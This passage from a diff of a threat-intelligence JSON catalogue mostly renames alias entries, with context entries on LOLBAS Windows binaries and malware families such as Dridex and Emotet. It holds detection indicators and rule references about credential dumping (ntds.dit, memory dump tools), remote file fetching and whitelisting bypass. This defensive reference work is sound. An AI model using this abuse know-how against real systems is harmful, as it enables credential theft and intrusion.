[file_event_win_susp_desktopimgdownldr_file.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml)\n* Elastic: [command_and_control_remote_file_copy_desktopimgdownldr.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml)\n* IOC: desktopimgdownldr.exe that creates non-image file\n* IOC: Change of HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PersonalizationCSP\\LockScreenImageUrl[[Desktopimgdownldr.exe - LOLBAS Project](/references/1df3aacf-76c4-472a-92c8-2a85ae9e2860)]", @@ -7535,7 +7535,7 @@ } ], "uuid": "5a91980c-cdb3-4dde-b38d-175c5af960f3", - "value": "DeviceCredentialDeployment.exe" + "value": "DeviceCredentialDeployment.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Device Credential Deployment\n\n**Author:** Elliot Killick\n\n**Paths:**\n* C:\\Windows\\System32\\DeviceCredentialDeployment.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\n* IOC: DeviceCredentialDeployment.exe should not be run on a normal workstation\n* Sigma: [proc_creation_win_lolbin_device_credential_deployment.yml](https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml)[[DeviceCredentialDeployment.exe - LOLBAS Project](/references/fef281e8-8138-4420-b11b-66d1e6a19805)]", @@ -7578,7 +7578,7 @@ } ], "uuid": "34e99ddb-8992-4b3a-acaf-e95bf601777e", - "value": "Devinit.exe" + "value": "Devinit.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Visual Studio 2019 tool\n\n**Author:** mr.d0x\n\n**Paths:**\n* C:\\Program Files\\Microsoft Visual Studio\\*\\Community\\Common7\\Tools\\devinit\\devinit.exe\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\*\\Community\\Common7\\Tools\\devinit\\devinit.exe\n\n**Resources:**\n* [https://twitter.com/mrd0x/status/1460815932402679809](https://twitter.com/mrd0x/status/1460815932402679809)\n\n**Detection:**\n* Sigma: [proc_creation_win_devinit_lolbin_usage.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml)[[Devinit.exe - LOLBAS Project](/references/27343583-c17d-4c11-a7e3-14d725756556)]", @@ -7621,7 +7621,7 @@ } ], "uuid": "9fcdac31-4219-4b10-83e6-b1c85f96de60", - "value": "Devtoolslauncher.exe" + "value": "Devtoolslauncher.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary will execute specified binary. Part of VS/VScode installation.\n\n**Author:** felamos\n\n**Paths:**\n* c:\\windows\\system32\\devtoolslauncher.exe\n\n**Resources:**\n* [https://twitter.com/_felamos/status/1179811992841797632](https://twitter.com/_felamos/status/1179811992841797632)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_devtoolslauncher.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml)\n* IOC: DeveloperToolsSvc.exe spawned an unknown process[[Devtoolslauncher.exe - LOLBAS Project](/references/cb263978-019c-40c6-b6de-61db0e7a8941)]", @@ -7663,7 +7663,7 @@ } ], "uuid": "02bce9ff-2975-4b0a-a8ab-8aaba3660803", - "value": "devtunnel.exe" + "value": "devtunnel.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary to enable forwarded ports on windows operating systems.\n\n**Author:** Kamran Saifullah\n\n**Paths:**\n* C:\\Users\\\\AppData\\Local\\Temp\\.net\\devtunnel\\\n* C:\\Users\\\\AppData\\Local\\Temp\\DevTunnels\n\n**Resources:**\n* [https://code.visualstudio.com/docs/editor/port-forwarding](https://code.visualstudio.com/docs/editor/port-forwarding)\n\n**Detection:**\n* IOC: devtunnel.exe binary spawned\n* IOC: *.devtunnels.ms\n* IOC: *.*.devtunnels.ms\n* Analysis: [https://cydefops.com/vscode-data-exfiltration](https://cydefops.com/vscode-data-exfiltration)[[devtunnel.exe - LOLBAS Project](/references/657c8b4c-1eee-4997-8461-c7592eaed9e8)]", @@ -7726,7 +7726,7 @@ } ], "uuid": "92344064-ad27-4fa5-8d50-fa56ff279213", - "value": "Dfshim.dll" + "value": "Dfshim.dll - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** ClickOnce engine in Windows used by .NET\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe\n\n**Resources:**\n* [https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf](https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf)\n* [https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe](https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)[[Dfshim.dll - LOLBAS Project](/references/30503e42-6047-46a9-8189-e6caa5f4deb0)]", @@ -7769,7 +7769,7 @@ } ], "uuid": "a9e71535-14ff-4715-a9f4-fac62b04753e", - "value": "Dfsvc.exe" + "value": "Dfsvc.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** ClickOnce engine in Windows used by .NET\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe\n\n**Resources:**\n* [https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf](https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf)\n* [https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe](https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)[[Dfsvc.exe - LOLBAS Project](/references/7f3a78c0-68b2-4a9d-ae6a-6e63e8ddac3f)]", @@ -7812,7 +7812,7 @@ } ], "uuid": "6e0bb5fd-f650-4ba0-bd6f-d6b90b1a7777", - "value": "Diantz.exe" + "value": "Diantz.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary that package existing files into a cabinet (.cab) file\n\n**Author:** Tamir Yehuda\n\n**Paths:**\n* c:\\windows\\system32\\diantz.exe\n* c:\\windows\\syswow64\\diantz.exe\n\n**Resources:**\n* [https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_diantz_ads.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml)\n* Sigma: [proc_creation_win_lolbin_diantz_remote_cab.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml)\n* IOC: diantz storing data into alternate data streams.\n* IOC: diantz getting a file from a remote machine or the internet.[[diantz.exe_lolbas](/references/66652db8-5594-414f-8a6b-83d708a0c1fa)]", @@ -7930,7 +7930,7 @@ } ], "uuid": "84346cb2-601a-45ff-9d88-f0516cfaa688", - "value": "Diskshadow.exe" + "value": "Diskshadow.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\diskshadow.exe\n* C:\\Windows\\SysWOW64\\diskshadow.exe\n\n**Resources:**\n* [https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_diskshadow.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml)\n* Sigma: [proc_creation_win_susp_shadow_copies_deletion.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml)\n* Elastic: [credential_access_cmdline_dump_tool.toml](https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml)\n* IOC: Child process from diskshadow.exe[[Diskshadow.exe - LOLBAS Project](/references/27a3f0b4-e699-4319-8b52-8eae4581faa2)]", @@ -7972,7 +7972,7 @@ } ], "uuid": "16a67a60-df5f-443e-b0f3-07254ce0b923", - "value": "Dnscmd.exe" + "value": "Dnscmd.exe - Associated Software" }, { "description": "Dnscmd is a Windows command-line utility used to manage DNS servers.[[Dnscmd Microsoft](/references/24b1cb7b-357f-470f-9715-fa0ec3958cbb)]", @@ -8053,7 +8053,7 @@ } ], "uuid": "2e252d44-c667-4570-950b-255c7f291f24", - "value": "dnx.exe" + "value": "dnx.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** .Net Execution environment file included with .Net.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* N/A\n\n**Resources:**\n* [https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/](https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_dnx.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)[[dnx.exe - LOLBAS Project](/references/50652a27-c47b-41d4-a2eb-2ebf74e5bd09)]", @@ -8121,7 +8121,7 @@ } ], "uuid": "83b39733-9672-4272-922f-7883d91ca94b", - "value": "Retefe" + "value": "Retefe - Associated Software" }, { "description": "[Dok](https://app.tidalcyber.com/software/dfa14314-3c64-4a10-9889-0423b884f7aa) is a Trojan application disguised as a .zip file that is able to collect user credentials and install a malicious proxy server to redirect a user's network traffic (i.e. [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9)).[[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)][[hexed osx.dok analysis 2019](https://app.tidalcyber.com/references/96f9d36a-01a5-418e-85f4-957e58d49c1b)][[CheckPoint Dok](https://app.tidalcyber.com/references/8c178fd8-db34-45c6-901a-a8b2c178d809)]", @@ -8212,7 +8212,7 @@ } ], "uuid": "d9e30f26-11a6-48f5-bb26-d9b624b6b1d0", - "value": "Dotnet.exe" + "value": "Dotnet.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** dotnet.exe comes with .NET Framework\n\n**Author:** felamos\n\n**Paths:**\n* C:\\Program Files\\dotnet\\dotnet.exe\n\n**Resources:**\n* [https://twitter.com/_felamos/status/1204705548668555264](https://twitter.com/_felamos/status/1204705548668555264)\n* [https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc](https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc)\n* [https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/](https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/)\n* [https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/](https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_dotnet.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: dotnet.exe spawned an unknown process[[Dotnet.exe - LOLBAS Project](/references/8abe21ad-88d1-4a5c-b79e-8216b4b06862)]", @@ -8253,7 +8253,7 @@ } ], "uuid": "48f30a38-0b80-45ad-9f80-d99c96c79cf4", - "value": "Delphacy" + "value": "Delphacy - Associated Software" }, { "description": "[Downdelph](https://app.tidalcyber.com/software/f7b64b81-f9e7-46bf-8f63-6d7520da832c) is a first-stage downloader written in Delphi that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) in rare instances between 2013 and 2015. [[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)]", @@ -8373,7 +8373,7 @@ } ], "uuid": "614ca144-20e8-4387-b723-4a5f3cd7164b", - "value": "Bugat v5" + "value": "Bugat v5 - Associated Software" }, { "description": "[Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) is a prolific banking Trojan that first appeared in 2014. By December 2019, the US Treasury estimated [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) had infected computers in hundreds of banks and financial institutions in over 40 countries, leading to more than $100 million in theft. [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) was created from the source code of the Bugat banking Trojan (also known as Cridex).[[Dell Dridex Oct 2015](https://app.tidalcyber.com/references/f81ce947-d875-4631-9709-b54c8b5d25bc)][[Kaspersky Dridex May 2017](https://app.tidalcyber.com/references/52c48bc3-2b53-4214-85c3-7e5dd036c969)][[Treasury EvilCorp Dec 2019](https://app.tidalcyber.com/references/074a52c4-26d9-4083-9349-c14e2639c1bc)]", @@ -8480,7 +8480,7 @@ } ], "uuid": "dc0ffa58-c5d3-4ea4-ab3f-4e9e75bc92b8", - "value": "dsdbutil.exe" + "value": "dsdbutil.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. Can be used as a command line utility to export Active Directory.\n\n**Author:** Ekitji\n\n**Paths:**\n* C:\\Windows\\System32\\dsdbutil.exe\n* C:\\Windows\\SysWOW64\\dsdbutil.exe\n\n**Resources:**\n* [https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358](https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358)\n* [https://www.netwrix.com/ntds_dit_security_active_directory.html](https://www.netwrix.com/ntds_dit_security_active_directory.html)\n\n**Detection:**\n* IOC: Event ID 4688\n* IOC: dsdbutil.exe process creation\n* IOC: Event ID 4663\n* IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit\n* IOC: Event ID 4656\n* IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit\n* Analysis: None Provided\n* Sigma: None Provided\n* Elastic: None Provided\n* Splunk: None Provided\n* BlockRule: None Provided[[dsdbutil.exe - LOLBAS Project](/references/fc982faf-a37d-4d0b-949c-f7a27adc3030)]", @@ -8520,7 +8520,7 @@ } ], "uuid": "8e9c7640-e49f-42ea-b28f-a00e4019fb4c", - "value": "dsquery.exe" + "value": "dsquery.exe - Associated Software" }, { "description": "[dsquery](https://app.tidalcyber.com/software/06402bdc-a4a1-4e4a-bfc4-09f2c159af75) is a command-line utility that can be used to query Active Directory for information from a system within a domain. [[TechNet Dsquery](https://app.tidalcyber.com/references/bbbb4a45-2963-4f04-901a-fb2752800e12)] It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.", @@ -8601,7 +8601,7 @@ } ], "uuid": "cf43ff32-746a-44c9-9fbe-aa50b747f5a8", - "value": "Dump64.exe" + "value": "Dump64.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Memory dump tool that comes with Microsoft Visual Studio\n\n**Author:** mr.d0x\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\Installer\\Feedback\\dump64.exe\n\n**Resources:**\n* [https://twitter.com/mrd0x/status/1460597833917251595](https://twitter.com/mrd0x/status/1460597833917251595)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_dump64.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml)\n* IOC: As a Windows SDK binary, execution on a system may be suspicious[[Dump64.exe - LOLBAS Project](/references/b0186447-a6d5-40d7-a11d-ab2e9fb93087)]", @@ -8644,7 +8644,7 @@ } ], "uuid": "2aeee11b-2b25-4b93-ad2f-1bb60ac491a4", - "value": "DumpMinitool.exe" + "value": "DumpMinitool.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Dump tool part Visual Studio 2022\n\n**Author:** mr.d0x\n\n**Paths:**\n* C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\Extensions\\TestPlatform\\Extensions\n\n**Resources:**\n* [https://twitter.com/mrd0x/status/1511415432888131586](https://twitter.com/mrd0x/status/1511415432888131586)\n\n**Detection:**\n* Sigma: [proc_creation_win_dumpminitool_execution.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml)\n* Sigma: [proc_creation_win_dumpminitool_susp_execution.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml)\n* Sigma: [proc_creation_win_devinit_lolbin_usage.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml)[[DumpMinitool.exe - LOLBAS Project](/references/4634e025-c005-46fe-b97c-5d7dda455ba0)]", @@ -8706,7 +8706,7 @@ } ], "uuid": "f41beff8-0ae1-48d6-bb13-b47c4763f4d1", - "value": "NeD Worm" + "value": "NeD Worm - Associated Software" }, { "description": "[DustySky](https://app.tidalcyber.com/software/77506f02-104f-4aac-a4e0-9649bd7efe2e) is multi-stage malware written in .NET that has been used by [Molerats](https://app.tidalcyber.com/groups/679b7b6b-9659-4e56-9ffd-688a6fab01b6) since May 2015. [[DustySky](https://app.tidalcyber.com/references/b9e0770d-f54a-4ada-abd1-65c45eee00fa)] [[DustySky2](https://app.tidalcyber.com/references/4a3ecdec-254c-4eb4-9126-f540bb21dffe)][[Kaspersky MoleRATs April 2019](https://app.tidalcyber.com/references/38216a34-5ffd-4e79-80b1-7270743b728e)]", @@ -8754,7 +8754,7 @@ } ], "uuid": "71444288-becb-435f-b1f9-b4abce44d092", - "value": "Dxcap.exe" + "value": "Dxcap.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** DirectX diagnostics/debugger included with Visual Studio.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\dxcap.exe\n* C:\\Windows\\SysWOW64\\dxcap.exe\n\n**Resources:**\n* [https://twitter.com/harr0ey/status/992008180904419328](https://twitter.com/harr0ey/status/992008180904419328)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_susp_dxcap.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml)[[Dxcap.exe - LOLBAS Project](/references/7611eb7a-46b7-4c76-9728-67c1fbf20e17)]", @@ -8795,7 +8795,7 @@ } ], "uuid": "5cad75f1-7395-4eb1-9370-c36857b4fcb4", - "value": "Dyzap" + "value": "Dyzap - Associated Software" }, { "description": "[[Sophos Dyreza April 2015](https://app.tidalcyber.com/references/50f9aa49-dde5-42c9-ba5c-f42281a71b7e)]", @@ -8809,7 +8809,7 @@ } ], "uuid": "ee1346ac-a3e0-45dd-963c-497fca47c3e8", - "value": "Dyreza" + "value": "Dyreza - Associated Software" }, { "description": "[Dyre](https://app.tidalcyber.com/software/38e012f7-fb3a-4250-a129-92da3a488724) is a banking Trojan that has been used for financial gain. \n [[Symantec Dyre June 2015](https://app.tidalcyber.com/references/a9780bb0-302f-44c2-8252-b53d94da24e6)][[Malwarebytes Dyreza November 2015](https://app.tidalcyber.com/references/0a5719f2-8a88-44e2-81c5-2d16a39f1f8d)]", @@ -8945,7 +8945,7 @@ } ], "uuid": "3c935fc9-aedf-4800-b6a1-f52612702600", - "value": "HEAVYHAND" + "value": "HEAVYHAND - Associated Software" }, { "description": "[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", @@ -8959,7 +8959,7 @@ } ], "uuid": "8c68d850-b73d-40d8-9499-26ec1c1dbbb2", - "value": "SigLoader" + "value": "SigLoader - Associated Software" }, { "description": "[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", @@ -8973,7 +8973,7 @@ } ], "uuid": "a24219ab-2f4a-4922-864c-ea07e354bab2", - "value": "DESLoader" + "value": "DESLoader - Associated Software" }, { "description": "[Ecipekac](https://app.tidalcyber.com/software/6508d3dc-eb22-468c-9122-dcf541caa69c) is a multi-layer loader that has been used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) since at least 2019 including use as a loader for [P8RAT](https://app.tidalcyber.com/software/1933ad3d-3085-4b1b-82b9-ac51b440e2bf), [SodaMaster](https://app.tidalcyber.com/software/6ecd970c-427b-4421-a831-69f46047d22a), and [FYAnti](https://app.tidalcyber.com/software/be9a2ae5-373a-4dee-9c1e-b54235dafed0).[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", @@ -9051,7 +9051,7 @@ } ], "uuid": "de4852b9-1f8b-4ef2-b3da-29be62458ea5", - "value": "SNAKEHOSE" + "value": "SNAKEHOSE - Associated Software" }, { "description": "[EKANS](https://app.tidalcyber.com/software/cd7821cb-32f3-4d81-a5d1-0cdee94a15c4) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://app.tidalcyber.com/software/cd7821cb-32f3-4d81-a5d1-0cdee94a15c4) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://app.tidalcyber.com/software/d8a4a817-2914-47b0-867c-ad8eeb7efd10).[[Dragos EKANS](https://app.tidalcyber.com/references/c8a018c5-caa3-4af1-b210-b65bbf94c8b2)][[Palo Alto Unit 42 EKANS](https://app.tidalcyber.com/references/dcdd4e48-3c3d-4008-a6f6-390f896f147b)]", @@ -9094,7 +9094,7 @@ } ], "uuid": "87856d15-2fdc-42fd-b8c0-d48505ec5691", - "value": "Page" + "value": "Page - Associated Software" }, { "description": "[[Lotus Blossom Jun 2015](https://app.tidalcyber.com/references/46fdb8ca-b14d-43bd-a20f-cae7b26e56c6)]", @@ -9108,7 +9108,7 @@ } ], "uuid": "12b94df0-6a70-4946-8672-72e770bc12a1", - "value": "BKDR_ESILE" + "value": "BKDR_ESILE - Associated Software" }, { "description": "[Elise](https://app.tidalcyber.com/software/fd5efee9-8710-4536-861f-c88d882f4d24) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://app.tidalcyber.com/groups/2849455a-cf39-4a9f-bd89-c2b3c1e5dd52). It is part of a larger group of\ntools referred to as LStudio, ST Group, and APT0LSTU. [[Lotus Blossom Jun 2015](https://app.tidalcyber.com/references/46fdb8ca-b14d-43bd-a20f-cae7b26e56c6)][[Accenture Dragonfish Jan 2018](https://app.tidalcyber.com/references/f692c6fa-7b3a-4d1d-9002-b1a59f7116f4)]", @@ -9208,7 +9208,7 @@ } ], "uuid": "ee981808-fa0c-462c-b767-e48f1ca7122a", - "value": "Geodo" + "value": "Geodo - Associated Software" }, { "description": "[Emotet](https://app.tidalcyber.com/software/c987d255-a351-4736-913f-91e2f28d0654) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) and [IcedID](https://app.tidalcyber.com/software/7f59bb7c-5fa9-497d-9d8e-ba9349fd9433). Emotet first emerged in June 2014 and has been primarily used to target the banking sector. [[Trend Micro Banking Malware Jan 2019](https://app.tidalcyber.com/references/4fee21e3-1b8f-4e10-b077-b59e2df94633)]", @@ -9260,7 +9260,7 @@ } ], 